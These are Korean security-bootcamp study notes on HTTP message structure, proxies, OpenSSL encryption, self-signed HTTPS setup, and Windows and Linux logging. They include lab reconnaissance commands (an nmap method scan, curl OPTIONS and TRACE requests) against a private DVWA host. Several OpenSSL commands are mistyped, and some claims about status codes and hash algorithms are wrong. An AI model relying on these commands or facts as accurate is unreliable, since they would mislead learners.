HTTP 1.1 : 텍스트 전송부터 이미지 전송까지 한 번의 세션에 끝난다. ⇒ 여러 요청을 한 번의 세션에서 처리하는 방식(영속적인 커넥션)

2. Request 구조

# 요청 라인
POST /dvwa/login.php HTTP/1.1

# 요청 헤더(header)
Host: 192.168.10.60 # 요청이 전송되는 서버의 도메인
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 # 요청을 생성한 클라이언트의 정보
# 클라이언트가 수신할 수 있는 미디어 타입, 언어, 인코딩 형식
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
# 요청 본문 미디어 타입, 길이
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.10.60
Connection: close
Referer: http://192.168.10.60/dvwa/login.php
Cookie: security=high; PHPSESSID=16fac79f111d3bb1fc9c1bc82a31310c
Upgrade-Insecure-Requests: 1
# 공백라인
# 요청 메세지 본문(body)
username=admin&password=password&Login=Login

2.1. 요청라인

POST /dvwa/login.php HTTP/1.1
# Method     URI         HTTP ver

URI의 / 표시는 index.html 요청을 의미

< Method 종류 >

GET : 일반 데이터를 요청할 때 사용, URI에 표시됨
POST : 일반 데이터를 요청할 때 사용, Body부분에 데이터를 넣어서 요청
PUT : POST와 유사, 지정된 위치에 파일을 서버에 올릴 때 사용
DELETE : 지정된 위치의 파일을 삭제할 때 사용
HEAD : GET 방식과 동일, 서버의 상태 확인할 때 사용 ✅ HEAD 와 OPTIONS 는 공격자가 공격을 하기 전 서버 상태와 허용되는 메소드를 확인할 때 사용할 수 있다.
OPTIONS : HEAD보다 구체적으로 서버의 상태를 확인할 때 사용
TRACE : 프록시를 이용해서 서버에 접속할 때 몇 개의 프록시를 경유해서 서버에 도착하는지 확인 가능
- Request 헤더에 Maz-Forwards 라는 항목이 표시되는 것을 확인할 수 있음
CONNECT : 클라이언트가 프록시 서버를 통해 다른 네트워크 서비스에 직접 연결을 요청할 때 사용
PATCH : 리소스 일부를 수정하는 경우 사용

< nmap으로 서버 스캔하기 >

# 해당 IP가 열어둔 Methods 확인 가능
$ nmap --script http-methods 192.168.10.60

# HEAD 메소드를 보내는 명령어
$ curl -I 192.168.10.60

< curl을 이용해 특정 IP에 OPTIONS 요청 >

$ curl -v -X OPTIONS 192.168.10.60

< telnet을 이용해 특정 IP의 특정 포트로 원격접속 >

# 192.168.10.60에 80포트로 접속
$ telnet 192.168.10.60 80
# Method * HTTP/1.1 입력 후 Enter 2번

< curl을 이용해 특정 URL에 TRACE 요청 >

$ curl -v -X TRACE http://192.168.10.60

2.2. 요청헤더

Host: 192.168.10.60 # 어느 사이트에 접속했는지 알려주는 호스트
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
# text는 html 형식의 파일을 받을 수 있고, application은 xhtml과 xml을 받아들일 수 있다.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.10.60
Connection: close
Referer: http://192.168.10.60/dvwa/login.php
Cookie: security=high; PHPSESSID=16fac79f111d3bb1fc9c1bc82a31310c
Upgrade-Insecure-Requests: 1

2.3. 공백라인

개행문자 CR+LF

2.4. 메세지 본문

username=admin&password=password&Login=Login

Post 방식으로 요청한 경우에만 나타난다.
Body가 있으면 반드시 Response에 Content-type이나 Content-Length가 나타난다.

3. Response 구조

# 상태라인
HTTP/1.1 200 OK
# 응답헤더(header)
Date: Thu, 25 Jan 2024 02:41:09 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 23 Jan 2024 13:46:26 GMT
ETag: "45b6-5c7e8b346b800"
Accept-Ranges: bytes
Content-Length: 17814
Vary: Accept-Encoding
Content-Type: text/html
# 공백라인
# 메세지 본문(body)



Welcome to My Website!


Hello, world!
Welcome to my website. Here you can find a lot of interesting content. Enjoy your stay!

3.1. 상태라인

HTTP/1.1 200 OK
# HTTP버전    요청실행결과코드

< Response 코드 >

2xx : 성공
3xx : 리다이렉션(방향 재지정) - Location 확인 가능
- 301 : 영구적 이동
- 302 : 일시적 이동
- 304 : 리소스 변경X 로컬 캐시의 복사본 사용 ✅ 200과 300의 공통점 : 요청 성공 ✅ 200과 300의 차이점 : 300은 지연시간이 발생
4xx : 클라이언트측 에러
- 400 : 문법적 오류
- 401 : 인증 실패
- 403 : 접근 권한이 없는 리소스를 요청
- 404 : 존재하지 않는 리소스를 요청
5xx : 서버측 에러
- 500 : 소프트웨어상(애플리케이션) 오류
- 501 : 웹에서 요청한 메소드가 서버에서 허용하는 것이 아닐 경우
- 502 : 서버와 클라이언트를 중계해주는 프록시에 문제가 발생할 경우 ✅ 웹에서 게이트웨이는 프록시를 의미
- 503 : 하드웨어상(RAM,CPU) 오류

3.2. 응답헤더

Date: Thu, 25 Jan 2024 02:41:09 GMT # 응답 생성 날짜와 시간
Server: Apache/2.4.41 (Ubuntu) # 응답을 생성한 웹 서버 정보
Last-Modified: Mon, 23 Jan 2024 13:46:26 GMT # 문서가 마지막으로 변경된 날짜와 시간
ETag: "45b6-5c7e8b346b800" # 문서 버전을 나타내는 식별자
Accept-Ranges: bytes # 서버가 받아들일 수 있는 범위 요청
Content-Length: 17814 # 본문 길이(byte)
Vary: Accept-Encoding # 캐시서버가 요청 헤더를 기반으로 캐시된 응답을 선택하는 방법을 표시
Content-Type: text/html # 응답 본문의 미디어 타입

3.3. 공백라인

개행문자 CR+LF

3.4. 메세지 본문




Welcome to My Website!


Hello, world!
Welcome to my website. Here you can find a lot of interesting content. Enjoy your stay!

4. Proxy Server

4.1. 정의

서버와 클라이언트 간의 요청과 응답을 중계하는 역할을 수행하는 서버(프로그램)

4.2. 목적 및 기능

트래픽 분산 : Load Balancer 로 사용됨
캐시 서버로 이용
보안 :
- Forward Proxy
  1. 실제 서버 또는 클라이언트의 IP를 숨김
  2. 들어오는 IP의 주소를 변환 시킴 ⇒ 차단된 사이트 접속
- Reverse Proxy
  1. 서버 쪽에서 생성
  2. 내부 서버의 안정성을 보장하기 위해 서비스 제공 서버의 IP를 변환 시킴

이 외 여러가지 목적으로 사용 해킹할 때는 멀티레이어 웹 프록시를 사용

💡 < 프록시 서버를 사용하고 있는지 알 수 있는 2가지 방법 >

Request 메소드가 Connect면 프록시를 경유해 들어왔음을 알 수 있다.
URI에 프로토콜부터 전체 주소가 보여지면 프록시를 사용했음을 알 수 있다.

[SK shieldus Rookies 16기][클라우드기반 시스템 운영 및 구축] 암호화, SSL/TLS, HTTPS 구성 실습

Mon, 08 Jan 2024 02:29:54 GMT

1. 대칭키 암호화 VS 비대칭 암호화

1.1. 대칭키 암호화

동일한 키로 암호화와 복호화
알고리즘 종류 : DES, 3DES, AES, Twofish

1.2. 비대칭 암호화

서로 다른 키로 암호화와 복호화
- Public Key(공개키) = 공개키
- Private Key(개인키) = 발행 주체만 갖는 키
알고리즘 종류 : RSA, ECC
고려해야할 부분 : 키를 생성해서 반드시 배포해줘야 한다. 일반적으로 네이버에서는 공개키를 인증서로 전달한다.

💡 크롬에서 인증서 확인하는 방법

1.3. 암호화의 역할

기밀성 (Confidentiality) : 인가받은 사람만 접근할 수 있는지
신뢰성 (Authenticity) : 정보의 출처 또는 사용자 자격 증명을 신뢰할 수 있는지
무결성 (Integrity) : 정보가 조작되지 않았음을 보장하는지 ⇒ Key를 이용한 암호화 기술로서 해결

1.4. 대칭키 암호화 실습

       (1) 공유된 대칭키를 사용하여 데이터 암호화 
A ---- (2) B의 대칭키를 사용하여 암호화된 정보 전송 ----> B
       (3) B는 자신의 대칭키로 암호화된 정보를 복호화

$ echo 'This is th plain text' > P1.txt
$ ls P1.txt
$ cat P1.txt

암호화

# openssl enc -e -암호화 알고리즘 -salt값 사용여부 -in 암호화할 파일명 -out P2.bin
$ openssl enc -e -des- salt -in P1.txt -out P2.bin

복호화

# $ openssl enc 
$ openssl enc -d -des3 -in P2.bin -out P3.txt

1.5. 비대칭 암호화 실습

A <----------- (1) B의 공개키를 얻는다 ------------ B
A ----(2) B의 공개키를 사용하여 암호화된 정보 전송 ----> B
      (3) B는 자신의 개인키로 암호화된 정보를 복호화

공개키로 암호화 / 개인키로 복호화 ⇒ 기밀성

개인키로 암호화 / 공개키로 복호화 ⇒ 신뢰성(송신자 인증)
- 개인키로 암호화하는 것을 전자서명 라고 한다.

Private Key 생성

# RSA로 개인키 생성, 키의 길이는 2048bit (1024는 안전 X 주로 2048) 
$ openssl genrsa -out private.pem 2048

개인키를 만들면 이 키를 수신자에게 메일이나 USB로 전달하면 된다. 비대칭키 암호화 방식에서는 개인키를 가진 인가자만이 데이터를 열람할 수 있다. == 기밀성 보장

Public Key 생성

개인키-공개키는 하나의 세트이다. private 개인키에 대한 공개키이다.

$ openssl rsa -in private.pem -out public.pem -outfrom PEM -pubout

평문을 공개키로 암호화

$ openssl rsautl -encrypt -inkey pulic.pem -pubin -in P1.txt -out P4.ssl

파일이 암호화 됐는지 확인

$ cat P5.txt

개인키로 복호화

$ openssl rsautl -decrypt -inkey private.pem -in P4.ssl -out P5.txt

파일이 복호화 됐는지 확인

$ ls -l
$ cat P5.txt

3. 암호화 알고리즘 VS 해시 알고리즘

암호화 알고리즘 (양방향성) : DES, 3DES, RSA
해시 알고리즘 (단방향성) : HD, SHA

3.1. 해시

하나의 문자열을 이를 상징하는 더 짧은 길이의 값이나 키로 변환하는 것

💡 오픈소스 파일들은 해시값을 공개하게 되어있다. 원본과 다운로드 받은 파일이 동일한지 비교해서 파일이 변조됐는지 확인 후 설치하도록 하기 위해서

3.2. 해시 알고리즘 순서

(1) A는 전달할 원본 데이터의 해시값 + 개인키 암호 ⇒ 전자서명
(2) A --------- B에게 데이터 전송 ---------> B
(3) B는 A의 공용키로 전자서명을 복호화 ⇒ 원본의 Digest와 복호화한 Digest를 비교하여 원본 확인

💡 개인 대 개인인 경우 해시 알고리즘을 사용하게 되면 송신자와 수신자가 어떤 해시 알고리즘을 사용하고, 어떻게 전송할지 협의해야한다. 기업의 경우 네이버 같이 큰 사이트는 인증서로 공개키, 해시 알고리즘(전자서명)을 포함시킨다.

💡 원본파일을 해시로 만들면 용량이 줄어든다. 왜? 일정한 패턴의 문자열로 바뀌기 때문에

4. SSL/TLS

실제 인증서 루트 발급 기관 : CA
공인인증서 발급 대리기관 : 은행, 증권사

4.1. 자체 발급 인증서

발급 대상과 발급자가 동일한 경우 자체 발급 인증서라고 한다.
자체 인증은 최상위 인증서 발급 기관(CA)만 가능하다.
자체 발급 인증서는 유효성 검사 X

⇒ 자체 발급 인증서를 사용하려면 신뢰할 수 있는 루트 인증 기관에 인증서를 Import 해야한다.

4.2. 인증서 오류

오류가 발생하는 이유는 다음과 같다.

인증서의 유효기간이 지난 경우
인증서의 유효성 검사에 실패한 경우
인증서의 유효성 검사를 할 수 없는 경우
인증서 자체에 문제가 있는 경우

CA전자서명(개인키)는 Web서버의 공개키는

인증기관(CA)에서 웹 브라우저에게 인증서(CA공개키)를 배포한다.
사용자가 웹 브라우저를 설치하면 인증서(CA공개키)도 함께 설치된다.
웹 서버에서 키(개인키, 공개키)를 생성한다.
웹 서버가 인증기관에게 인증요청서(공개키)를 제출한다.
인증기관에서 웹 서버가 제출한 인증요청을 심사한다.
인증기관이 웹 서버가 도메인 이름으로 인증서(전자서명)를 발급해준다.
웹 서버가 클라이언트에게 Web 서버 공개키와 CA 전자서명을 제출한다.
클라이언트가 갖고 있는 CA 인증서로 Web서버가 제공한 공개키와 CA 전자서명의 신뢰를 확인한다.
암호화된 데이터를 전송한다. ⇒ 이런 일련의 프로세스 절차 자체, 복합 보안 시스템 환경을 PKI 라고 한다.

SSL에서 대칭키 : 데이터 암호화 비대칭키 : 공개키(대칭키를 암호화 시키기 위함) ⇒ 대칭키를 안전하게 사용하기 위해 비대칭키를 사용한다.

HTTPS : 웹 클라이언트와 웹 서버 가이에 웹 문서를 암호화

5. HTTPS 구성 실습

시나리오
1. 웹 서버(HTTP) 설치
2. 환경설정
3. 방화벽 활성화
4. 서비스 활성화
인증서 생성
1. 키 생성
2. 인증요청서 (*.csr)
3. 인증서 (*.crt)

5.1. HTTP Server 구성

1. httpd 설치 확인

# httpd 설치확인
$ rpm -qa | grep httpd

# httpd 버전확인
$ httpd -v

# 오픈소스 SSL 설치 확인
$ rpm -qa | grep openssl

2. 인증서 작업을 위한 설정 준비

# httpd에 모듈있는지 확인
$ ls /etc/httpd/modules/mod_ssl.so

# 모듈 없으면 설치
$ yum -y install mod_ssl

3. 환경 설정 확인 후 index.html(홈페이지 작성)

/etc/httpd/conf/httpd.conf ⇒ http 환경 설정 파일 /var/www/html/index.html ⇒ 홈페이지 파일

$ cd /etc/httpd/conf
$ ls httpd.conf
$ nano httpd.conf

$ cd /var/www/html
$ nano index.html


  
      Hello World
  
  
      Hello World!

4. 방화벽 설정하기

# 80번 포트 개방 후 활성화 
$ iptables –I INPUT –m state --state NEW,ESTABLISHED –p tcp --dport 80 -j ACCEPT

# iptables 설정 저장
$ service iptables save

# iptables 서비스 시작
$ service iptables start

5. 웹 서비스 활성화

# httpd 서비스 시작
$ service httpd start

6. 클라이언트 확인

192.168.10.30 또는 www.open.net 으로 접속

7. Win10에서 hosts 파일 수정

$ cd C:\\Windows\System32\drivers\etc
$ notepad hosts

8. Win10에서 접속 확인

5.2. HTTPS Server 구성

1. 개인키 생성

$ cd /etc/pki/tls/certs
$ openssl genrsa -out www.open.net.key 2048

2. 인증요청서(.csr) 생성

$ openssl req -new -key www.open.net.key -out www.open.net.csr

여기서 잘못되면 처음부터 다시 해야한다.

3. 개인키와 인증요청서(.csr)를 이용해 인증서(.crt) 생성

$ openssl x509 -in www.open.net.csr -out www.open.net.crt -req -signkey www.open.net.key -days 365

인증서 확인

/etc/pki/tls/certs/www.open.net.crt /etc/pki/tls/certs/www.open.net.csr /etc/pki/tls/certs/www.open.net.key

4. httpd-ssl.conf 파일에 인증서(.crt)와 인증키 맵핑

ssl.conf 파일 존재하는지 확인

$ nano ssl.conf

Server Certificate에 /etc/pki/tls/certs/www.open.net.crt Server Private Key에 /etc/pki/tls/certs/www.open.net.key

5. 방화벽 설정

$ iptables -I INPUT -m state --state NEW,ESTABLISHED -p tcp --dport 443 -j ACCEPT

$ service iptables restart
$ service httpd restart

6. Win10에서 확인

자체 발급 인증서기 때문에 유효성 검사를 할 수 없어서 인증서 오류 화면이 나타났다.

엣지 브라우저에서 자체적으로 발급받은 인증서를 확인할 수 있다.

7. 인증서 설치

인증서 내보내기 인증서 설치

설치된 인증서 확인

인터넷 익스플로러로 확인하면 인증서 오류 없이 페이지가 뜨는 것을 확인할 수 있다.

[SK shieldus Rookies 16기][클라우드기반 시스템 운영 및 구축] 윈도우 로그

Fri, 05 Jan 2024 07:08:59 GMT

1. 윈도우 로그

윈도우에서는 로그를 이벤트라고 지칭
윈도우 운영상의 로그는 이벤트 뷰어에서 관리 ⇔ 프로세스 생성, 삭제, 네트워크 접속 현황은 모니터링 툴인 Sysmon을 이용
운영체제가 업그레이드 됨에 따라 버전 별로 형태와 경로가 상이함
- Window 2000/XP/2003
  - 저장경로 : \windows\system32\config
  - 확장자명 : .evt
- Windows Vista/2008/7/10
  - 저장경로 : \windows\system32\winevt\logs
  - 확장자명 : .evtx

2. 이벤트 뷰어

2.1. 전역 로그

응용프로그램
- 윈도우 번들 소프트웨어의 활성화 여부 기록
- 응용 프로그램이 기록한 다양한 로그가 저장
- 활성화 여부를 기록, 해당 프로그램의 개발자에 의해 로그 형태 달라짐
보안
- 인가/비인가자들의 로그인 시도 및 파일 생성, 열람, 삭제 등의 자원 사용에 관한 기록
- 감사 정책을 통해 다양한 기록들이 저장
설정
- 애플리케이션 설치 시 발생하는 이벤트 기록
- 프로그램이 잘 설치되었는지 호환성 문제는 없는지 확인 가능
시스템
- 서비스 실행여부, 파일 시스템 필터, 디바이스 구성요소 기록
- 시스템에서 시스템 부팅 시 드라이버가 로드되지 않은 경우와 같은 구성요소의 오류 기록 ⇒ 설정을 해줘야 기록됨 제어판 > 시스템 > 고급 시스템 설정 > 시작 및 복구
전달된 이벤트
- 원격 컴퓨터에서 수집된 이벤트 저장
- 구독 사용 시 전달된 이벤트 로그에 기록

2.2. 응용 프로그램 및 서비스 로그

단일 응용 프로그램이나 구성 요소의 이벤트 저장

3. 로그 필터링

3.1. 이벤트 수준

정보 : 응용 프로그램, 드라이버, 서비스가 성공적으로 수행된 경우 기록
경고
- 시스템에 문제가 발생할 수 있는 문제를 미리 알려줌
- 디스크 공간이 부족 시 발생
오류 : 응용 프로그램 또는 구성 요소 외부에 있는 기능에 영향을 줄 수 있는 문제가 발생했음을 나타냄
- 데이타 손실이나 기능 상실 같은 중대한 문제 발생한 경우
- 시스템을 시작하는 동안 서비스가 로그되지 못했을 경우
위험 : 응용 프로그램 또는 구성 요소가 자동으로 복구할 수 없는 오류가 발생한 경우

3.2. 이벤트 ID

4726 : 계정 삭제
4624 : 로그인 성공
4625 : 로그인 실패
5142 : 네트워크 공유 개체가 추가
5632 : 무선 네트워크에 인증 요청
4689 : 프로토콜 끝냄
6005 : 시스템 시작
6006 : 시스템 종료

4. 감사 정책

4.1. 정의

보안 로그 정책 보안 이슈에 대해 어떤 정책을 생성, 정책에 따라 이벤트 뷰어에서 확인가능.

4.2. 로컬 정책 > 감사 정책

1) 개체 액세스 감사 (권장값 : 감사안함)

객체에 대한 접근 성공/실패 여부를 기록할지 결정하는 항목
특정 파일이나 디렉터리, 레지스트리 키, 프린터 같은 객체에 접근을 시도하거나 속성을 변경하려는 것을 탐지
대상을 선정하고 접근 권한을 부여하는 것을 개체별로 설정 (ex. 파일 속성 탭 -> 보안탭)
- 검사안함 : 객체에 대한 접근을 성공하든 실패하든 로그를 기록 안함 ⇒ 안하는 이유는? 너무 많은 로그가 쌓이기 때문에

2) 계정 관리 감사 (권장값 : 실패)

계정 관리 이벤트를 감사할지 여부를 결정하는 항목
신규 사용자, 그룹의 추가, 기존 사용자의 그룹 변경, 사용자의 활성화/비활성화, 계정 패스워드 변경 등을 감사
사용자의 계정이 잠겨(lock)있더라도 로그가 생성
실패 : 계정 관리 이벤트가 실패 했을 때 생성되는 로그

3) 프로세스 추적 감사 (권장값 : 감사안함)

프로세스 생성, 종료 , 핸들 복제 및 간접 개체 액세스 같은 프로세스 관련 이벤트를 감사할지 여부를 결정하는 항목
감사안함 : 프로세스가 성공하든 실패하든 검사를 안함

4) 권한 사용 감사 (권장값 : 실패)

사용자 권한을 이용하려고 할 때마다 이벤트를 생성 할 지 결정하는 항목
권한 설정을 변경할 때나 관리자 권한이 필요한 작업을 수행 시
계정을 생성하거나 권한을 변경 시
관리자 권한의 작업이 일어날 때 마다 로그가 남기 때문에 많은 로그가 생성
실패 : 사용자 권한 사용에 실패 했을 때 생성되는 로그

5) 시스템 이벤트 감사 (권장값 : 감사안함)

시스템 시작,종료 & 보안 로그에 영향을 미치는 이벤트를 기록할지를 결정하는 항목
시스템의 다시 시작하거나 종료되는 경우
보안 로그 삭제 등 시스템의 주요한 사항에 대해
검사안함 : 위의 모든 행동에 대해 기록 안함

6) 로그온 이벤트 감사 (권장값 : 성공,실패)

로컬계정에 대한 로그온/오프 성공/실패에 대한 이벤트를 기록할지를 결정하는 항목
계정 로그온 이벤트 감사와 비슷하나, 로컬 계정의 접근 시 생성되는 이벤트를 감사
성공,실패 : 로컬계정에 대한 로그온/오프 하였을때 성공 시 , 실패 시 모두 로그로 기록

7) 계정 로그온 이벤트 감사 (권장값 : 성공,실패)

도메인 계정의 로그온 성공/실패 로그를 기록할지를 결정하는 항목
성공,실패 : 다른계정이 도메인으로 접속 하였을때 로그인 성공 시와 실패 시 모두 로그로 기록

💡 계정 로그온 과 계정 관리 감사 의 차이 username 는 로컬에서 관리하기 때문에 계정관리 감사 username@naver.com 과 같이 도메인을 타고 오는 경우 도메인 그룹에서 다루기 때문에

8) 정책 변경 감사(권장값 : 성공,실패)

감사 정책의 변경 시 성공과 실패 이벤트를 기록할지를 결정하는 항목
성공,실패 : 감사 정책의 변경 성공 시 , 실패 시 모두 로그로 기록

9) 디렉터리 서비스 액세스 감사(권장값 : 실패)

액티브 디렉터리의 SACL(시스템 액세스 제어 목록)에 있는 사용자가 해당 개체에 액세스를 시도 할 때 이벤트생성 할 지 결정하는 항목
실패 : SACL이 있는 액티브 디렉터리의 객체에 실패 했을 때 로그 생성

[SK shieldus Rookies 16기][클라우드기반 시스템 운영 및 구축] 리눅스 로그, syslog와 rsyslog, rsyslog 전송 및 수신 실습

Fri, 05 Jan 2024 00:38:56 GMT

1. 로그(Log)

1.1. 정의

시스템의 모든 기록을 담고 있는 데이터
성능, 오류, 경고 및 운영 정보 등의 중요 정보 기록

1.2. 특징

특별한 형태의 기준에 따라 숫자와 기호 등으로 이루어짐
로그를 분석하지 않고 그대로 활용하기는 어렵다. ⇒ 왜? 웹서버의 경우 하루 수백 메가에서 기가 단위의 로그가 쌓이기 때문에 대용량 로그를 일일이 살펴보기란 어렵다.

1.3. 로그 데이터의 중요성

문제 원인 추적 및 예방
오류, 보안 이슈 탐지
시스템 예측 및 복구 지원
침해 사고 근거 자료
법적 의무 준수의 필수 요소

1.4. 로그 분석

로그 데이터를 분석하여 필요로 하는 유용한 정보로 만드는 행위

1.5. 분석할 로그 종류

네트워크/보안 장비 로그
- 방화벽
- VPN
- 라우터 / 스위치
- IPS
- IDS
서버/Endpoint/애플리케이션 로그
- 서버
- 이벤트
- 애플리케이션

2. 리눅스 로그 종류

2.1. 텍스트 기반 로그

cat 으로 읽을 수 있다.

/var : 가변 데이터 저장소
/var/log : 로그 위치, 파일 유형(텍스트, 바이너리(설치파일) 형태)
/var/mailog : 시스템 상태 알림 로그
/var/log/secure : 인증 시스템 로그(PAM 등)
/var/log/boot.log : 시스템 부팅 로그
/var/log/cron : 작업 스케쥴링 로그
/var/log/httpd : 아파치 웹 서버 로그
/var/log/samba : 삼바 서버 로그
/var/log/maillog : 메일 서버 로그 (Sendmail, Postfix 등)
/var/log/xferlog : FTP 서버 로그 (VSFTP, Proftp 등)

💡 리눅스 로그는 분산 저장되어 있거나 중복 저장이 되어 있기 때문에 완벽하게 삭제가 어렵다.

✅ 바이너리 로그 명령어 반드시 숙지!!

2.3. 바이너리 로그

명령어를 이용해서 읽어야 한다.

/var/run/utmp

사용자의 현재 로그인 정보 기록

# 현재 시스템에 로그인한 모든 사용자 정보(사용자 이름, 로그인 시간, 로그인한 터미널 등)
$ who
webserver :0           2024-01-04 17:24 (:0)
webserver pts/0        2024-01-04 17:25 (:0)

# who의 정보 +@ 시스템 로드 정보, 시스템 가동시간
$ w
 21:41:56 up  4:18,  2 users,  load average: 0.25, 0.11, 0.10
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
webserve :0        17:24   ?xdm?   6:49   0.32s gdm-session-worker [pam/gdm-password]
webserve pts/0     17:25    4.00s  4.81s  9.35s /usr/libexec/gnome-terminal-server

# user --- 실행안됨

# 특정 사용자의 정보
$ finger 사용자명

/var/log/wtmp

사용자 로그인/로그아웃, 시스템 종료, 부팅/재부팅, 정보 기록

conole, telnet, ftp 통한 원격 로그인 정보

# 사용자 로그인 정보 확인(사용자 이름, 터미널, 시간과 날짜, 세션 지속시간)
$ last
webserve pts/0        :0               Thu Jan  4 17:25   still logged in   
webserve :0           :0               Thu Jan  4 17:24   still logged in   
(unknown :0           :0               Thu Jan  4 17:23 - 17:24  (00:01)    
reboot   system boot  3.10.0-123.el7.x Thu Jan  4 17:23 - 21:16  (03:53)    
webserve pts/0        :0               Thu Jan  4 15:37 - crash  (01:45)    
webserve pts/0        :0               Thu Jan  4 13:07 - 15:37  (02:29)    
webserve :0           :0               Thu Jan  4 13:07 - crash  (04:15)    
(unknown :0           :0               Thu Jan  4 13:06 - 13:07  (00:00)    
reboot   system boot  3.10.0-123.el7.x Thu Jan  4 13:06 - 21:16  (08:10)    
reboot   system boot  3.10.0-123.el7.x Thu Jan  4 12:29 - 13:06  (00:37)

특정 사용자의 마지막 로그인 정보 확인

$ last 사용자이름 wtmp begins Thu Jan 4 12:29:15 2024

시스템이 재부팅한 날짜 확인

$ last reboot reboot system boot 3.10.0-123.el7.x Thu Jan 4 17:23 - 21:26 (04:03)
reboot system boot 3.10.0-123.el7.x Thu Jan 4 13:06 - 21:26 (08:20)
reboot system boot 3.10.0-123.el7.x Thu Jan 4 12:29 - 13:06 (00:37)

wtmp begins Thu Jan 4 12:29:15 2024

마지막으로 재부팅된 시간 확인 -1 옵션은 last 명령어가 표시할 라인 수

$ last -1 reboot reboot system boot 3.10.0-123.el7.x Thu Jan 4 17:23 - 21:28 (04:05)

로그인/로그아웃 활동 이력 파일을 검색하여 해당 파일이 생성된 이후로 로그인한 모든 사용자의 목록 표시

/var/log/wtmp 파일은 로테이션 파일이기 때문에 오래된 항목은 파일명 뒤에 .1처럼 숫자가 붙는다.

last와 last -f /var/log/wtmp 명령어의 결과가 동일한 이유는 last가 /var/log/wtmp 파일을 검색하여 내용을 보여주기 때문에

$ last -f /var/log/wtmp.1

가장 최근에 로그인한 두 명의 사용자 정보 표시

$ last 2 wtmp begins Thu Jan 4 12:29:15 2024


#### /var/log/btmp
사용자의 로그인 실패 기록
```shell
$ lastb
btmp begins Thu Jan  4 17:23:09 2024

/var/log/lastlog

시스템 계정의 마지막 가장 최근 로그인 정보

$ lastlog
사용자이름       포트     어디서           최근정보
root             pts/0                     목  1월  4 17:26:54 +0900 2024
bin                                        **한번도 로그인한 적이 없습니다**
daemon                                     **한번도 로그인한 적이 없습니다**
adm                                        **한번도 로그인한 적이 없습니다**
lp                                         **한번도 로그인한 적이 없습니다**
sync                                       **한번도 로그인한 적이 없습니다**
shutdown                                   **한번도 로그인한 적이 없습니다**
halt                                       **한번도 로그인한 적이 없습니다**
mail                                       **한번도 로그인한 적이 없습니다**
operator                                   **한번도 로그인한 적이 없습니다**
games                                      **한번도 로그인한 적이 없습니다**
ftp                                        **한번도 로그인한 적이 없습니다**
nobody                                     **한번도 로그인한 적이 없습니다**
dbus                                       **한번도 로그인한 적이 없습니다**
polkitd                                    **한번도 로그인한 적이 없습니다**
usbmuxd                                    **한번도 로그인한 적이 없습니다**
ntp                                        **한번도 로그인한 적이 없습니다**
saslauth                                   **한번도 로그인한 적이 없습니다**
libstoragemgmt                             **한번도 로그인한 적이 없습니다**
avahi                                      **한번도 로그인한 적이 없습니다**
avahi-autoipd                              **한번도 로그인한 적이 없습니다**
rpc                                        **한번도 로그인한 적이 없습니다**
rtkit                                      **한번도 로그인한 적이 없습니다**
chrony                                     **한번도 로그인한 적이 없습니다**
radvd                                      **한번도 로그인한 적이 없습니다**
colord                                     **한번도 로그인한 적이 없습니다**
apache                                     **한번도 로그인한 적이 없습니다**
rpcuser                                    **한번도 로그인한 적이 없습니다**
nfsnobody                                  **한번도 로그인한 적이 없습니다**
unbound                                    **한번도 로그인한 적이 없습니다**
qemu                                       **한번도 로그인한 적이 없습니다**
abrt                                       **한번도 로그인한 적이 없습니다**
pulse                                      **한번도 로그인한 적이 없습니다**
gdm              :0                        목  1월  4 17:23:12 +0900 2024
gnome-initial-setup                           **한번도 로그인한 적이 없습니다**
pcp                                        **한번도 로그인한 적이 없습니다**
postfix                                    **한번도 로그인한 적이 없습니다**
sshd                                       **한번도 로그인한 적이 없습니다**
oprofile                                   **한번도 로그인한 적이 없습니다**
tcpdump                                    **한번도 로그인한 적이 없습니다**
webserver        :0                        목  1월  4 17:24:40 +0900 2024

/usr/account/pacct

시스템에 로그인한 사용자가 실행한 프로그램 정보 기록
로그인해서 로그오프 할 때까지 입력 정보 등을 기록 (※ 시스템 자원을 많이 소모하기 때문에 기본적으로 동작 X)
```
$ acctcom
$ lastcomm
```

💡 이 모든 로그들은 리눅스 로그 관리 패키지 syslog 나 rsyslog 에 의해 저장되고 관리된다.

3. syslog와 rsyslog

3.1. 정의

응용 프로그램 또는 커널에서 생성된 로그를 관리해주는 리눅스 로그 관리 패키지
기존 syslog 를 확장시킨 버전이 rsyslog

3.2. 위치

/etc/syslog.conf /etc/rsyslog.conf

$ ls /etc/syslog.*

3.3. /etc/rsyslog.conf 파일

규칙을 만들 때 고려해야하는 부분 - 어떤 문제가 생겼을 때 로그를 남길 것인가?

$ cat /var/log/secure

# 형식
[facility].[proiority]                   [action]

facility : 메세지를 발생시키는 프로그램 유형
- 종류
  - cron : cron, at과 같은 스케줄링 프로그램이 발생한 메시지
  - auth, security : login과 같이 인증프로그램 유형이 발생한 메시지
  - authpriv : ssh와 같이 인증을 필요한 프로그램 유형이 발생한 메시지. 사용자 추가 시에도 메시지가 발생
  - daemon : telnet, ftp 등과 같이 여러 데몬이 발생한 메시지
  - kern : 커널이 발생한 메시지
  - lpr : 프린트 유형의 프로그램이 발생한 메시지
  - mail : mail 시스템이 발생한 메시지
  - mark : syslogd에 의해 만들어지는 날짜 유형
  - news : 유즈넷 뉴스 프로그램 유형이 발생한 메시지
  - syslog : syslog 프로그램이 유형이 발생한 메시지
  - user : 사용자 프로세스
  - uucp : UUCP(UNIX to UNIX Copy Protocol)시스템이 발생한 메시지. local0 ~ local7 여분으로 남겨둔 유형
  - * : 모든 facility를 의미
proiority : 위험도
- 종류
  - none : 로그로 기록 X
  - debug : 프로그램을 개발 또는 테스트 할 때 발생하는 메시지
  - info : 사용자가 알아둬야 할 기본정보 메시지
  - notice : 특별한 주의를 필요하나 에러는 아닌 메시지
